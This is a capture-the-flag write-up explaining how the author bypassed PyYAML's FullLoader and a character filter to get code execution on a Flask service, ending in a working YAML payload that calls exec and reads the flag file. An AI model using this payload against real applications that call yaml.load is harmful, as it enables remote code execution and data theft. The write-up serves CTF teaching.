# deserializeme In this challenge, we're linked a website as well as its Flask backend. It consists of a single route that loads a YAML file we provide in the request body: ```python @app.route('/', methods=["POST"]) def pwnme(): if not re.fullmatch(b"^[\n --/-\]a-}]*$", request.data, flags=re.MULTILINE): return "Nice try!", 400 return yaml.load(request.data) ``` Before anything else, I first verified that this worked as intended. My template for sending YAML files and receiving the result: ```python import requests r = requests.post('https://deserializeme.chal.uiuc.tf/', data=open('payload.yaml').read()) print(r.text) # {"hello":"world","number":9} ``` ## Vulnerability PyYAML is well-known for having unsafe deserialization, mainly because they support all sorts of interaction with Python. I'll reference their [documentation](https://pyyaml.org/wiki/PyYAMLDocumentation#yaml-tags-and-python-types) throughout the writeup. However, there are two restrictions to keep in mind. First, `yaml.load` uses `FullLoader` by default, which bans the `!!python/object/apply` tag among other things. This means that we won't be able to call arbitrary functions like `eval`, although we can still construct class objects with the `!!python/object/new` tag. Second, this challenge uses a regex filter, which bans the following characters: * Periods * Carets * Underscores * Backticks This prevents us from accessing objects from other modules, which are specified with the `<module>.<name>` format. Fortunately, PyYAML will use the `builtins` module by default if you don't supply a period. I'm not sure if this is in the documentation, but the [source code](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L540) proves it: ```python def find_python_name(self, name, mark, unsafe=False): if not name: raise ConstructorError("while constructing a Python object", mark, "expected non-empty name appended to the tag", mark) if '.' in name: module_name, object_name = name.rsplit('.', 1) else: module_name = 'builtins' object_name = name ``` To summarize, we can construct and reference built-in objects. However, we can't call functions, and our goal will be to execute code arbitrarily. ## Exploit This is the format for specifying class construction, as per the [documentation](https://pyyaml.org/wiki/PyYAMLDocumentation#objects): ```yaml !!python/object/new:module.Class args: [argument, ...] kwds: {key: value, ...} state: ... listitems: [item, ...] dictitems: [key: value, ...] ``` Right away, I was interested in the `state` field. It turns out that PyYAML uses it to add arbitrary attributes to an object after it's constructed! This won't work for most built-in types, since they have read-only attributes. Fortunately, some classes are writeable: `Warning`, the `Error` types, etc. Hence the following creates an object where `obj.hello == 'world'`: ```yaml !!python/object/new:Warning state: hello: 'world' ``` Not every attribute can be set, however. PyYAML calls `check_state_key` on each key value, which matches against a regex. Keys of the form `__something__` are banned, which makes some sense. Interestingly, the key `extend` is also banned. PyYAML justifies this in the [source code](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L483): > `extend` is blacklisted because it is used by construct_python_object_apply to add `listitems` to a newly generate python instance Let's look at the `construct_python_object_apply` method for clarification: ```python if state: self.set_python_instance_state(instance, state) if listitems: instance.extend(listitems) if dictitems: for key in dictitems: instance[key] = dictitems[key] return instance ``` Notice that if there were no blacklist, this payload would give RCE: ```yaml !!python/object/new:Warning state: extend: !!python/name:exec listitems: 'whatever python code we want' ``` We first set `extend` to be the built-in `exec` function, using the `!!python/name` tag. Now `instance.extend` is a static method, which PyYAML subsequently calls on `listitems` - a code string! We've essentially created an object that 'spoofs' a list. In general, this bug exists whenever code assumes the type of an object we provide. It must then call a method with an argument that we control as well. I spent a lot of time looking for this scenario in the Flask source code, but I ended up finding one in PyYAML - coincidentally the function which sets state. Here's the [source](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L595): ```python def set_python_instance_state(self, instance, state, unsafe=False): if hasattr(instance, '__setstate__'): instance.__setstate__(state) else: slotstate = {} if isinstance(state, tuple) and len(state) == 2: state, slotstate = state if hasattr(instance, '__dict__'): if not unsafe and state: for key in state.keys(): self.check_state_key(key) instance.__dict__.update(state) elif state: slotstate.update(state) for key, value in slotstate.items(): if not unsafe: self.check_state_key(key) setattr(instance, key, value) ``` Notice that `slotstate` is assumed to be a dictionary. Yet if `state` is a tuple, the code destructures it into `(state, slotstate)`. Since no other type checks are performed, we have full control over both objects! In particular, this lets us exploit `slotstate.update(state)`. We want `slotstate` to be a dummy object where `update` points to `exec`. Hence `state` should be a tuple containing a code string and dummy object, in that order. One final caveat: in order to reach the `elif` block, our outer class instance cannot have the `__dict__` attribute - a read-only type like `str` works. Here's a payload which prints the flag: ```yaml !!python/object/new:str state: !!python/tuple - 'print(getattr(open("flag\x2etxt"), "read")())' - !!python/object/new:Warning state: update: !!python/name:exec ``` A few more notes: * Since periods are banned, I escaped it in the filename. Remember that it isn't YAML supporting hex escape sequences, but `exec`. * In order to access object attributes and methods without periods, I used `getattr`. * The easiest way to exfiltrate from the server is to make an HTTP request containing the flag. This is left as an exercise to the reader :smile: